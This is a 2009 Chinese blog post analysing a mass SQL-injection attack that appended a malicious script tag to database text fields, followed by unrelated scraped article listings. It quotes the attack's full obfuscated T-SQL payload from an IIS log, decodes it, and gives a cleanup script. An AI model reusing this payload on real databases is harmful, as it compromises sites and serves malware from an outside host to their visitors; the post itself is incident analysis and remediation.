数据库被挂马2

author:perfectaction
date :2009.05

从去开始,有很多网站数据库的表的text、ntext、varchar、nvarchar字段内容末尾被加入"> </title> <script src=http://s.see9.us/s.js> <或是3b3.org等字符

我也遇到过,通过分析iis日志,搜索"Update%20",找到很多,如:
2008-**-** 00:17:54 59.39.69.146 - W3SVC1 80 GET show.asp id=8826;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20select%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20where%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('Update%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 302 0 HTTP/1.1 211.68.23.76 Mozilla/4.0 - -

这段代码我还原后如下: 

      
        

       
         eclare
       
          
       
         @t
       
          
       
         varchar
       
         (
       
         255
       
         ),
       
         @c
       
          
       
         varchar
       
         (
       
         255
       
         ) 
       
         declare
       
          table_cursor 
       
         cursor
       
          
       
         for
       
          
       
         select
       
          a.name,b.name 
       
         from
       
          sysobjects a,syscolumns b 
       
         where
       
          a.iD
       
         =
       
         b.iD 
       
         AnD
       
          a.xtype
       
         =
       
         '
       
         u
       
         '
       
          
       
         AnD
       
          (b.xtype
       
         =
       
         99
       
          
       
         or
       
          b.xtype
       
         =
       
         35
       
          
       
         or
       
          b.xtype
       
         =
       
         231
       
          
       
         or
       
          b.xtype
       
         =
       
         167
       
         ) 
       
         open
       
          table_cursor 
       
         fetch
       
          
       
         next
       
          
       
         from
       
          table_cursor 
       
         into
       
          
       
         @t
       
         ,
       
         @c
       
          
       
         while
       
         (
       
         @@fetch_status
       
         =
       
         0
       
         ) 
       
         begin
       
          
       
         print
       
         (
       
         '
       
         update [
       
         '
       
          
       
         +
       
          
       
         @t
       
          
       
         +
       
          
       
         '
       
         ] set [
       
         '
       
          
       
         +
       
          
       
         @c
       
          
       
         +
       
          
       
         '
       
         ]=rtrim(convert(varchar,[
       
         '
       
          
       
         +
       
          
       
         @c
       
          
       
         +
       
          
       
         '
       
         ])) + cast(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D aS varchar(67))
       
         '
       
         ) 
       
         fetch
       
          
       
         next
       
          
       
         from
       
          table_cursor 
       
         into
       
          
       
         @t
       
         ,
       
         @c
       
          
       
         end
       
          
       
         close
       
          table_cursor 
       
         deallocate
       
          table_cursor;

实事上,上面的print实际为exec..其原理就是通过遍历所有的表中的字符类型字段,然后update其内容,加上攻击者的字符.

同理,若要去掉这些字符,也可以利用上面的代码: 

      
        

       
         declare
       
          
       
         @t
       
          
       
         varchar
       
         (
       
         255
       
         ),
       
         @c
       
          
       
         varchar
       
         (
       
         255
       
         ) 
       
         declare
       
          table_cursor 
       
         cursor
       
          
       
         for
       
          
       
         select
       
          a.name,b.name 
       
         from
       
          sysobjects a,syscolumns b 
       
         where
       
          a.iD
       
         =
       
         b.iD 
       
         AnD
       
          a.xtype
       
         =
       
         '
       
         u
       
         '
       
          
       
         AnD
       
          (b.xtype
       
         =
       
         99
       
          
       
         or
       
          b.xtype
       
         =
       
         35
       
          
       
         or
       
          b.xtype
       
         =
       
         231
       
          
       
         or
       
          b.xtype
       
         =
       
         167
       
         ) 
       
         declare
       
          
       
         @str
       
          
       
         varchar
       
         (
       
         500
       
         ) 
       
         --
       
         这里是你要替换的字符
       
          
       
         set
       
          
       
         @str
       
         =
       
         '
       
         "></title><script src=http://s.see9.us/s.js></script><!--
       
         '
       
          
       
         open
       
          table_cursor 
       
         fetch
       
          
       
         next
       
          
       
         from
       
          table_cursor 
       
         into
       
          
       
         @t
       
         ,
       
         @c
       
          
       
         while
       
         (
       
         @@fetch_status
       
         =
       
         0
       
         ) 
       
         begin
       
          
       
         exec
       
         (
       
         '
       
         update [
       
         '
       
          
       
         +
       
          
       
         @t
       
          
       
         +
       
          
       
         '
       
         ] set [
       
         '
       
          
       
         +
       
          
       
         @c
       
          
       
         +
       
          
       
         '
       
         ]=replace(cast([
       
         '
       
          
       
         +
       
          
       
         @c
       
          
       
         +
       
          
       
         '
       
         ] as varchar(8000)),
       
         '''
       
         +
       
         @str
       
         +
       
         '''
       
         ,
       
         ''''
       
         )
       
         '
       
         ) 
       
         fetch
       
          
       
         next
       
          
       
         from
       
          table_cursor 
       
         into
       
          
       
         @t
       
         ,
       
         @c
       
          
       
         end
       
          
       
         close
       
          table_cursor 
       
         deallocate
       
          table_cursor;

但事实上,攻击者在update数据库字段时,是采用先截取再加他自己字符的方法,所以对于text/ntext类型,如果你原来的字段内的字符>8000的话,已经无法全部还原成最初状态了.

你可能感兴趣的:(数据库)

  • 阿里云RDS到亚马逊云RDS的实时数据同步方案详解 ivwdcwso 运维阿里云云计算awskda数据同步
    1.需求背景在当今的多云环境中,企业经常需要在不同云平台之间同步数据。本文将详细介绍如何实现从阿里云RDSMySQL数据库到亚马逊云RDSMySQL数据库的实时数据同步。这种同步对于数据备份、跨区域数据访问、数据分析等场景都非常有用。2.方案概述我们将使用AWSKinesisDataAnalytics(KDA)作为核心组件来实现这个实时同步方案。KDA基于ApacheFlink,支持使用SQL或J
  • 实战探析:云数据库 RDS SQL Server 版的优点与应用案例 步入烟尘 python数据库oracle性能优化
    实战探析:云数据库RDSSQLServer版的优点与应用案例背景:随着云计算技术的不断发展,越来越多的企业开始将数据库迁移到云端,以降低成本、提高可用性和灵活性。而在云数据库的选择上,AmazonRDS(RelationalDatabaseService)SQLServer版本成为了众多企业的首选之一。本文将深入探讨在实际应用中,利用云数据库RDSSQLServer版所带来的优点及其实战应用。云数
  • MongoDB入门与实践 风中凌乱的猿 笔记mongodb数据库
    MongoDB是一个NoSQL数据库,它采用文档模型来存储数据,具有高性能、易扩展、灵活的特点。以下是MongoDB的入门指南和一些基本的实践示例,帮助你开始使用MongoDB。1.安装和基本配置安装MongoDB具体安装方法取决于你的操作系统。以Ubuntu为例,可以通过以下命令安装MongoDB:sudoaptupdatesudoaptinstall-ymongodb启动MongoDB安装完成
  • 【python学习】深度解析 Python 的 .env配置与最佳实践:温格高的环境变量配置之道 NLP仙人 pythonpython学习开发语言人工智能
    1.文章简介在开发和部署Python项目时,环境变量配置对于管理敏感信息如数据库连接字符串、API密钥至关重要。本文将以温格高(2023年环法冠军)的项目为例,详细介绍如何通过.env文件简化环境配置,并分享多环境管理、Docker集成等热门功能。我们还将覆盖一些小技巧和常见错误,帮助你避免开发中的踩坑。2.使用.env文件的好处温格高团队正在开发一个记录自行车赛事的应用,涉及多个开发环境和敏感信
  • 网络安全入门信息收集与漏洞扫描(二) 挣扎与觉醒中的技术人 网络安全入门及实战web安全网络安全c++程序人生
    主动信息收集1Nmap扫描端口与服务(1)Nmap是什么?定义:网络探测工具,用于扫描开放端口、识别服务及操作系统。典型用途:发现目标存活主机(ping扫描)。识别开放端口和运行的服务(如SSH、HTTP、数据库)。探测操作系统类型(Windows/Linux)。(2)基础扫描命令快速扫描常用端口:nmap-sV-T4192.168.1.100#-sV探测服务版本,-T4加速扫描示例输出:PORT
  • DeepSeek 如何获取数据库中的表信息(表名和字段名称) Python测试之道 数据库python
    问题背景在测试或开发过程中,了解数据库的表结构(包括表名和字段名称)是非常重要的一环,尤其是当我们需要测试数据库相关的功能或验证数据时。然而,手动查看数据库结构可能耗时且容易出错。如果能够通过DeepSeek与数据库直接交互,自动获取表名和字段信息,将大大提升测试效率。本文将介绍如何利用DeepSeek模型结合数据库查询,自动生成表结构信息(包括表名和字段名称)。此外,还会展示如何通过自然语言描述
  • spring boot整合kettle调用数据库资源库中的job 机智的小小岳 kettle
    前言上篇文章记录了springboot如何调用文件资源库下的job,这篇文章会记录如何调用数据库资源库的job1.导入jar包在调用文件路径下的job需要导入如下jar包而调用数据库资源库的job需要多导入2个jar包否则会报http错误,jar包如下2.运行代码代码如下:@TestpublicvoidexcuteDBTrans()throwsKettleException{//初始环境EnvUt
  • python创建sqlite3数据库_SQLite – Python | 菜鸟教程 weixin_39683144
    SQLite-Python安装SQLite3可使用sqlite3模块与Python进行集成。sqlite3模块是由GerhardHaring编写的。它提供了一个与PEP249描述的DB-API2.0规范兼容的SQL接口。您不需要单独安装该模块,因为Python2.5.x以上版本默认自带了该模块。为了使用sqlite3模块,您首先必须创建一个表示数据库的连接对象,然后您可以有选择地创建光标对象,这将
  • linux下使用mysql(上) It塔塔开 linuxmysql运维
    1、安装mysqlaptsearchmysql-server...#查询结果mysql-server-8.0/focal-security,focal-updates8.0.41-0ubuntu0.20.04.1amd64MySQLdatabaseserverbinariesandsystemdatabasesetup...aptinstallmysql-server-8.0...2、连接数据库m
  • python如何将数据生成excel_Python如何将数据导出excel的技巧分享 weixin_39528697
    本篇文章主要介绍了python技能之导出excel的实例代码,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧本文介绍了python技能之导出excel的实例代码,正好能用到,写出来分享给大家作为一个数据分析师,下面的需求是经常会遇到的。从数据库或者现有的文本文件中提取符合要求的数据,做一个二次处理,处理完成后的数据最终存储到excel表格中供其他部门的人继续二次分析。在
  • 使用 MySQL 从 JSON 字符串提取数据 m0_66323401 面试学习路线阿里巴巴mysqljsonoracle
    使用MySQL从JSON字符串提取数据在现代数据库管理中,JSON格式因其灵活性而广泛使用。然而,当数据存储在JSON中时,我们经常需要将其转换为更易于处理的格式。本篇文章将通过一个具体的SQL查询示例,展示如何从存储在MySQL中的JSON字符串提取数据并重新格式化。1.背景知识JSON(JavaScriptObjectNotation)是一种轻量级的数据交换格式,易于阅读和编写,同时也易于机器
  • 实验报告一:IT项目与技术实践 朱佳顺
    本文还有配套的精品资源,点击获取简介:实验报告是记录科学和技术实验过程、结果与分析的重要文件。本报告"01-实验报告一.zip"为系列报告中的第一份,包含实验目的、方法、数据、观察和结论。它可能涉及文件压缩、实验设计、数据处理和可视化、以及科学报告撰写等关键技能。实验内容可能包括编程、网络、数据库和软件开发等领域,要求学生了解实验流程,掌握数据分析方法,以及学术写作规范。1.文件压缩与ZIP格式使
  • Java面试八股文:Memcached面试题专场(持续更新中......) Java凤梨 Java金三银四面试题memcachedjava面试
    全套Java金三银四面试题持续更新可文末自取,建议关注收藏不然下次找不到哟~目录1、Memcached是什么,有什么作用?memcached服务在企业集群架构中有哪些应用场景?一、作为数据库的前端缓存应用二、作业集群的session会话共享存储。2、Memcached服务分布式集群如何实现?3、Memcached服务特点及工作原理是什么?4、简述Memcached内存管理机制原理?SlabAllo
  • redis 使用 m0_74825634 面试学习路线阿里巴巴redis数据库缓存
    文章目录补充说明语法选项参数实例连接服务端添加数据查询数据删除数据补充说明yum安装的redis.conf在/etc/redis/redis.conf语法redis-cli(选项)(参数)选项-a输入密码-n选择数据库若无此参数默认选中0数据库参数set添加数据keys用于查询此参数后可输入正则查询|keys"*"del删除数据实例连接服务端无密码链接:redis-cli有密码链接:redis-c
  • Python图形界面 Tkinter入门6 数据库sqlite3 mango大侠 Pythonpython数据库sqlite3tkinter
    6.1数据库sqlite3基础fromtkinterimport*importsqlite3importosroot=Tk()root.title('数据库sqlite3操作')root.geometry('400x400')#sqlite3-------------------------------------------------##检查数据库文件是否存在,不存在就创建,user表:ifn
  • Mongodb主从模式最佳方案 Christian Bai mongodb数据库
    我整理的一些关于【Java】的项目学习资料(附讲解~~)和大家一起分享、学习一下:https://d.51cto.com/bLN8S1MongoDB主从模式最佳方案MongoDB是一款开源的文档型数据库,被广泛应用于许多现代应用中。其强大的性能和灵活的数据结构使得它特别适合处理大数据和高并发访问。本文将介绍MongoDB的主从模式,并提供最佳方案和示例代码,帮助你更好地理解这种模式的运作原理。什么
  • 关于django __str__ 与 __unicode__ 问题 weixin_40105587 python
    因为所有字符串都作为Unicode字符串从数据库返回,基于字符的模型字段(CharField、TextField、URLField等)在Django从数据库检索数据时将包含Unicode值。即使数据可以放入ASCII字节字符串,也总是如此。您可以在创建模型或填充字段时传入bytestring,并且Django会在需要时将其转换为Unicode。¶选择__str__()和__unicode__()请
  • go hive skynet_MMORPG游戏服务器技术选型参考-Go语言中文社区 weixin_39908948 gohiveskynet
    游戏服务器一般追求稳定和效率,所以偏向于保守,使用的技术手段也是以已经过验证、开发人员最熟悉、能HOLD为主要前提。1、典型按场景分服设计开发语言:c++数据库:mysql架构:多个网关:维持与玩家间的SOCKET连接,可处理广播、断线重连等逻辑。一个或多个账号登陆验证服务器:处理登陆、排队等逻辑。多个场景服务器:处理在本地图上能解决的逻辑,如:打怪、玩家间战斗、接任务、完成任务等各种不需要跨地图
  • flask实现mysql连接池_如何在python flask中使用mysql.connection数据库池 weixin_39710396 flask实现mysql连接池
    Traceback(mostrecentcalllast):File"/home/myuser/virtualenv/py2.7-myapp-server-logger/lib/python2.7/site-packages/flask/app.py",line1836,in__call__returnself.wsgi_app(environ,start_response)File"/home/
  • 微服务es搜索关键词,实现关键词高亮,来自黑马头条的总结 菜鸡且互啄69 elasticsearch大数据搜索引擎java
    为了加快搜索效率从es数据库中查询实现的效果,要求从标题和内容中搜索关键词,然后让关键词高亮步骤ElasticSearch环境搭建索引库创建文章搜索多条件复合查询索引数据同步ElasticSearch环境搭建这些都是死步骤,直接cvik分词器下载地址:https://github.com/medcl/elasticsearch-analysis-ik下载完后,解压安装包到ElasticSearch
  • python flask django在线投票系统 md14i 专注分享bishe530 pythonflaskdjango
    文章目录具体实现截图项目技术介绍论文写作思路核心代码部分展示可定制开发功能创新亮点django项目示例源码/演示视频获取方式具体实现截图项目技术介绍Python版本:python3.7以上框架支持:flask/django开发软件:PyCharm数据库:mysql数据库工具:Navicat浏览器:谷歌浏览器(PycharmFlaskDjangoVuemysql)论文写作思路第一部分绪论,主要介绍所
  • mysql表误删回复_恢复mysql数据库误删数据 weixin_39655689 mysql表误删回复
    前言某一天,天朗气清;突然传来消息:数据库被删库了!这简直不亚于8级大地震呀;一找原因,服务器宕机造成了数据库数据丢失。于是,通过日志恢复数据的救援开始了。正文在数据库开启binlog功能找到/etc/my.cnf并编辑(没有my.cnf的时候就找my.ini);添加log-bin=mysql-binexpire_logs_days=7(日志保留天数)然后重启mysql注意:log_bin是生成的
  • mysql数据误删恢复_MySQL数据库误删除后如何恢复? 啟潍 mysql数据误删恢复
    原标题:MySQL数据库误删除后如何恢复?在日常运维工作中,对于数据库的备份是至关重要的!数据库对于网站的重要性使得我们对MySQL数据库的管理不容有失!然而是人总难免会犯错误,说不定哪天大脑短路了,误操作把数据库给删除了,怎么办?下面,就MySQL数据库误删除后的恢复方案进行说明。一、工作场景(1)MySQL数据库每晚12:00自动完全备份。(2)某天早上上班,9点的时候,一同事犯晕drop了一
  • 中科院空天院的面试题总结-Java web18285997089 面试学习路线阿里巴巴java开发语言
    JAVA1.谈谈ajax的异步请求,与同步请求的区别答:同步是指:发送方发出数据后,等接收方发回响应以后才发下一个数据包的通讯方式。异步是指:发送方发出数据后,不等接收方发回响应,接着发送下个数据包的通讯方式。自己说了一堆,面试官直接这两句回我,简洁明了,这就是功力,惭愧2.数据库中有成绩字段,给出查询排名前10的语句答:select*from(select*from表orderby成绩desc)
  • C#多线程异步连接MySQL与SQLserver数据库 weixin_46846685 WPFMySQL数据库c#mysqlsqlserverwpf异步Tuple
    C#多线程异步连接MySQL与SQLserver数据库一、前言二、多线程异步连接数据库代码2.1代码块2.2代码说明参考文档一、前言当编写代码连接多台设备上的数据库时,如果采用同步逐个连接的方式,在网络畅通的情况下连接速度尚可,但当其中一台设备网络不佳特别是处于关机状态时,等待数据库连接同时程序无法响应的时间会大幅度增加,即使设置ConnectTimeout也无法缩短等待时间,因为此时是程序在等待
  • 阿里云MWC 2019发布7款重磅产品,助力全球企业迈向智能化 数据库技术分享者 大数据数据库人工智能
    当地时间2月25日,在巴塞罗那举行的MWC2019上,阿里云面向全球发布了7款重磅产品,涵盖无服务器计算、高性能存储、全球网络、企业级数据库、大数据计算等主要云产品,可满足电子商务、物流、金融科技以及制造等各行业企业的数字化转型需求,助力全球企业迈向智能化。在大会期间,阿里云还携手德勤、RedHat以及VMware等合作伙伴展示了从基础设施到企业级应用的智能化解决方案。阿里云在MWC2019上展示
  • Qt学习1 qq_43361844 QTqt学习开发语言
    QUuidQUuid是Qt库中的一个类,用于生成、表示和操作UUID(通用唯一标识符,UniversallyUniqueIdentifier)。UUID是一种广泛使用的标识符,通常用来唯一地标识对象、记录、会话、文件、实体等。QUuid类简介QUuid类提供了一个简单的接口,用于创建、解析和操作UUID。UUID在很多应用场景中都有广泛使用,比如在数据库中作为主键、在分布式系统中唯一标识设备和实体
  • MySQL数据库三:操作数据库(二) 嘵奇 MySQL数据库mysql
    DQL查询数据(重点)DataQueryLanguage:数据查询语言●所有的查询操作都用它Select●简单的查询,复杂的查询它都能做●数据库中最核心的语言,最重要的语句●使用频率最高的语句基本查询代码演示:--简单查询语句SELECT*FROM`class`--查询表的全部信息SELECT`id`,`name`FROM`class`--查询表的指定信息SELECT`id`AS学号,`name`
  • 人工智能推理模型(S1-32B)超越DeepSeek? deepdata_cn 垂域模型人工智能人工智能大语言模型
    S1模型是由斯坦福大学和华盛顿大学的研究团队在李飞飞教授的领衔下开发的人工智能推理模型。从2000年李飞飞进入加州理工学院攻读研究生起,就一直从事人工智能研究,在计算机视觉领域创立了拥有1500万张图片的ImageNet数据库,为人工智能计算机视觉研究奠定了基础,也积累了深厚的人工智能技术理论和实践经验。论文地址:https://arxiv.org/pdf/2501.19393一、发展过程模型采用
  • 第1章大型互联网公司的基础架构——1.5 服务发现 卷心菜不卷Iris 读书笔记服务发现服务注册注册中心微服务互联网大厂大厂基础架构
    讲到这里,我们已经对一个客户端请求进入业务HTTP服务的过程有了较为详细的了解。业务HTTP服务在处理请求的过程中免不了与其他下游服务通信——可能会调用其他业务服务,可能需要访问数据库,可能会向消息中间件投递消息等,所以业务HTTP服务必须知道下游服务部署的可用地址。这就是本节要介绍的服务发现问题。这里不是特指HTTP服务,在当前流行的微服务架构下,任何服务都涉及与其他服务通信的问题。要求每个服务
  • 对股票分析时要注意哪些主要因素? 会飞的奇葩猪 股票 分析 云掌股吧
      众所周知,对散户投资者来说,股票技术分析是应战股市的核心武器,想学好股票的技术分析一定要知道哪些是重点学习的,其实非常简单,我们只要记住三个要素:成交量、价格趋势、振荡指标。     一、成交量   大盘的成交量状态。成交量大说明市场的获利机会较多,成交量小说明市场的获利机会较少。当沪市的成交量超过150亿时是强市市场状态,运用技术找综合买点较准;
  • 【Scala十八】视图界定与上下文界定 bit1129 scala
    Context Bound,上下文界定,是Scala为隐式参数引入的一种语法糖,使得隐式转换的编码更加简洁。   隐式参数 首先引入一个泛型函数max,用于取a和b的最大值 def max[T](a: T, b: T) = { if (a > b) a else b }  因为T是未知类型,只有运行时才会代入真正的类型,因此调用a >
  • C语言的分支——Object-C程序设计阅读有感 darkblue086 applec框架cocoa
    自从1972年贝尔实验室Dennis Ritchie开发了C语言,C语言已经有了很多版本和实现,从Borland到microsoft还是GNU、Apple都提供了不同时代的多种选择,我们知道C语言是基于Thompson开发的B语言的,Object-C是以SmallTalk-80为基础的。和C++不同的是,Object C并不是C的超集,因为有很多特性与C是不同的。 Object-C程序设计这本书
  • 去除浏览器对表单值的记忆 周凡杨 html记忆autocompleteform浏览
                                       &n
  • java的树形通讯录 g21121 java
    最近用到企业通讯录,虽然以前也开发过,但是用的是jsf,拼成的树形,及其笨重和难维护。后来就想到直接生成json格式字符串,页面上也好展现。 // 首先取出每个部门的联系人 for (int i = 0; i < depList.size(); i++) { List<Contacts> list = getContactList(depList.get(i
  • Nginx安装部署 510888780 nginxlinux
    Nginx ("engine x") 是一个高性能的 HTTP 和 反向代理 服务器,也是一个 IMAP/POP3/SMTP 代理服务器。 Nginx 是由 Igor Sysoev 为俄罗斯访问量第二的 Rambler.ru 站点开发的,第一个公开版本0.1.0发布于2004年10月4日。其将源代码以类BSD许可证的形式发布,因它的稳定性、丰富的功能集、示例配置文件和低系统资源
  • java servelet异步处理请求 墙头上一根草 java异步返回servlet
    servlet3.0以后支持异步处理请求,具体是使用AsyncContext ,包装httpservletRequest以及httpservletResponse具有异步的功能,        final AsyncContext ac = request.startAsync(request, response);   ac.s
  • 我的spring学习笔记8-Spring中Bean的实例化 aijuans Spring 3
    在Spring中要实例化一个Bean有几种方法: 1、最常用的(普通方法) <bean id="myBean" class="www.6e6.org.MyBean" /> 使用这样方法,按Spring就会使用Bean的默认构造方法,也就是把没有参数的构造方法来建立Bean实例。 (有构造方法的下个文细说) 2、还
  • 为Mysql创建最优的索引 annan211 mysql索引
    索引对于良好的性能非常关键,尤其是当数据规模越来越大的时候,索引的对性能的影响越发重要。 索引经常会被误解甚至忽略,而且经常被糟糕的设计。 索引优化应该是对查询性能优化最有效的手段了,索引能够轻易将查询性能提高几个数量级,最优的索引会比 较好的索引性能要好2个数量级。 1 索引的类型 (1) B-Tree 不出意外,这里提到的索引都是指 B-
  • 日期函数 百合不是茶 oraclesql日期函数查询
      ORACLE日期时间函数大全 TO_DATE格式(以时间:2007-11-02 13:45:25为例) Year: yy two digits 两位年 显示值:07 yyy three digits 三位年 显示值:007
  • 线程优先级 bijian1013 javathread多线程java多线程
    多线程运行时需要定义线程运行的先后顺序。 线程优先级是用数字表示,数字越大线程优先级越高,取值在1到10,默认优先级为5。 实例: package com.bijian.study; /** * 因为在代码段当中把线程B的优先级设置高于线程A,所以运行结果先执行线程B的run()方法后再执行线程A的run()方法 * 但在实际中,JAVA的优先级不准,强烈不建议用此方法来控制执
  • 适配器模式和代理模式的区别 bijian1013 java设计模式
    一.简介        适配器模式:适配器模式(英语:adapter pattern)有时候也称包装样式或者包装。将一个类的接口转接成用户所期待的。一个适配使得因接口不兼容而不能在一起工作的类工作在一起,做法是将类别自己的接口包裹在一个已存在的类中。      &nbs
  • 【持久化框架MyBatis3三】MyBatis3 SQL映射配置文件 bit1129 Mybatis3
     SQL映射配置文件一方面类似于Hibernate的映射配置文件,通过定义实体与关系表的列之间的对应关系。另一方面使用<select>,<insert>,<delete>,<update>元素定义增删改查的SQL语句, 这些元素包含三方面内容 1. 要执行的SQL语句 2. SQL语句的入参,比如查询条件 3. SQL语句的返回结果
  • oracle大数据表复制备份个人经验 bitcarter oracle大表备份大表数据复制
    前提:    数据库仓库A(就拿oracle11g为例)中有两个用户user1和user2,现在有user1中有表ldm_table1,且表ldm_table1有数据5千万以上,ldm_table1中的数据是从其他库B(数据源)中抽取过来的,前期业务理解不够或者需求有变,数据有变动需要重新从B中抽取数据到A库表ldm_table1中。    
  • HTTP加速器varnish安装小记 ronin47 http varnish 加速
    上午共享的那个varnish安装手册,个人看了下,有点不知所云,好吧~看来还是先安装玩玩! 苦逼公司服务器没法连外网,不能用什么wget或yum命令直接下载安装,每每看到别人博客贴出的在线安装代码时,总有一股羡慕嫉妒“恨”冒了出来。。。好吧,既然没法上外网,那只能麻烦点通过下载源码来编译安装了! Varnish 3.0.4下载地址: http://repo.varnish-cache.org/
  • java-73-输入一个字符串,输出该字符串中对称的子字符串的最大长度 bylijinnan java
    public class LongestSymmtricalLength { /* * Q75题目:输入一个字符串,输出该字符串中对称的子字符串的最大长度。 * 比如输入字符串“google”,由于该字符串里最长的对称子字符串是“goog”,因此输出4。 */ public static void main(String[] args) { Str
  • 学习编程的一点感想 Cb123456 编程感想Gis
           写点感想,总结一些,也顺便激励一些自己.现在就是复习阶段,也做做项目.      本专业是GIS专业,当初觉得本专业太水,靠这个会活不下去的,所以就报了培训班。学习的时候,进入状态很慢,而且当初进去的时候,已经上到Java高级阶段了,所以.....,呵呵,之后有点感觉了,不过,还是不好好写代码,还眼高手低的,有
  • [能源与安全]美国与中国 comsci 能源
         现在有一个局面:地球上的石油只剩下N桶,这些油只够让中国和美国这两个国家中的一个顺利过渡到宇宙时代,但是如果这两个国家为争夺这些石油而发生战争,其结果是两个国家都无法平稳过渡到宇宙时代。。。。而且在战争中,剩下的石油也会被快速消耗在战争中,结果是两败俱伤。。。       在这个大
  • SEMI-JOIN执行计划突然变成HASH JOIN了 的原因分析 cwqcwqmax9 oracle
    甲说: A B两个表总数据量都很大,在百万以上。 idx1  idx2字段表示是索引字段 A B 两表上都有 col1字段表示普通字段 select xxx from A where A.idx1 between mmm and nnn      and exists (select 1 from B where B.idx2 =
  • SpringMVC-ajax返回值乱码解决方案 dashuaifu AjaxspringMVCresponse中文乱码
      SpringMVC-ajax返回值乱码解决方案   一:(自己总结,测试过可行) ajax返回如果含有中文汉字,则使用:(如下例:) @RequestMapping(value="/xxx.do")       public @ResponseBody void getPunishReasonB
  • Linux系统中查看日志的常用命令 dcj3sjt126com OS
    因为在日常的工作中,出问题的时候查看日志是每个管理员的习惯,作为初学者,为了以后的需要,我今天将下面这些查看命令共享给各位 cat tail -f 日 志 文 件 说 明 /var/log/message 系统启动后的信息和错误日志,是Red Hat Linux中最常用的日志之一 /var/log/secure 与安全相关的日志信息 /var/log/maillog 与邮件相关的日志信
  • [应用结构]应用 dcj3sjt126com PHPyii2
    应用主体 应用主体是管理 Yii 应用系统整体结构和生命周期的对象。 每个Yii应用系统只能包含一个应用主体,应用主体在 入口脚本中创建并能通过表达式 \Yii::$app 全局范围内访问。 补充: 当我们说"一个应用",它可能是一个应用主体对象,也可能是一个应用系统,是根据上下文来决定[译:中文为避免歧义,Application翻译为应
  • assertThat用法 eksliang JUnitassertThat
    junit4.0  assertThat用法 一般匹配符1、assertThat( testedNumber, allOf( greaterThan(8), lessThan(16) ) ); 注释: allOf匹配符表明如果接下来的所有条件必须都成立测试才通过,相当于“与”(&&) 2、assertThat( testedNumber, anyOf( g
  • android点滴2 gundumw100 应用服务器android网络应用OSHTC
    如何让Drawable绕着中心旋转? Animation a = new RotateAnimation(0.0f, 360.0f, Animation.RELATIVE_TO_SELF, 0.5f, Animation.RELATIVE_TO_SELF,0.5f); a.setRepeatCount(-1); a.setDuration(1000); 如何控制Andro
  • 超简洁的CSS下拉菜单 ini htmlWeb工作html5css
    效果体验:http://hovertree.com/texiao/css/3.htmHTML文件: <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>简洁的HTML+CSS下拉菜单-HoverTree</title>
  • kafka consumer防止数据丢失 kane_xie kafkaoffset commit
    kafka最初是被LinkedIn设计用来处理log的分布式消息系统,因此它的着眼点不在数据的安全性(log偶尔丢几条无所谓),换句话说kafka并不能完全保证数据不丢失。   尽管kafka官网声称能够保证at-least-once,但如果consumer进程数小于partition_num,这个结论不一定成立。   考虑这样一个case,partiton_num=2
  • @Repository、@Service、@Controller 和 @Component mhtbbx DAOspringbeanprototype
    @Repository、@Service、@Controller 和 @Component 将类标识为Bean Spring 自 2.0 版本开始,陆续引入了一些注解用于简化 Spring 的开发。@Repository注解便属于最先引入的一批,它用于将数据访问层 (DAO 层 ) 的类标识为 Spring Bean。具体只需将该注解标注在 DAO类上即可。同时,为了让 Spring 能够扫描类
  • java 多线程高并发读写控制 误区 qifeifei java thread
    先看一下下面的错误代码,对写加了synchronized控制,保证了写的安全,但是问题在哪里呢? public class testTh7 { private String data; public String read(){ System.out.println(Thread.currentThread().getName() + "read data "
  • mongodb replica set(副本集)设置步骤 tcrct javamongodb
    网上已经有一大堆的设置步骤的了,根据我遇到的问题,整理一下,如下: 首先先去下载一个mongodb最新版,目前最新版应该是2.6 cd /usr/local/bin wget http://fastdl.mongodb.org/linux/mongodb-linux-x86_64-2.6.0.tgz tar -zxvf mongodb-linux-x86_64-2.6.0.t
  • rust学习笔记 wudixiaotie 学习笔记
    1.rust里绑定变量是let,默认绑定了的变量是不可更改的,所以如果想让变量可变就要加上mut。 let x = 1; let mut y = 2; 2.match 相当于erlang中的case,但是case的每一项后都是分号,但是rust的match却是逗号。 3.match 的每一项最后都要加逗号,但是最后一项不加也不会报错,所有结尾加逗号的用法都是类似。 4.每个语句结尾都要加分
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他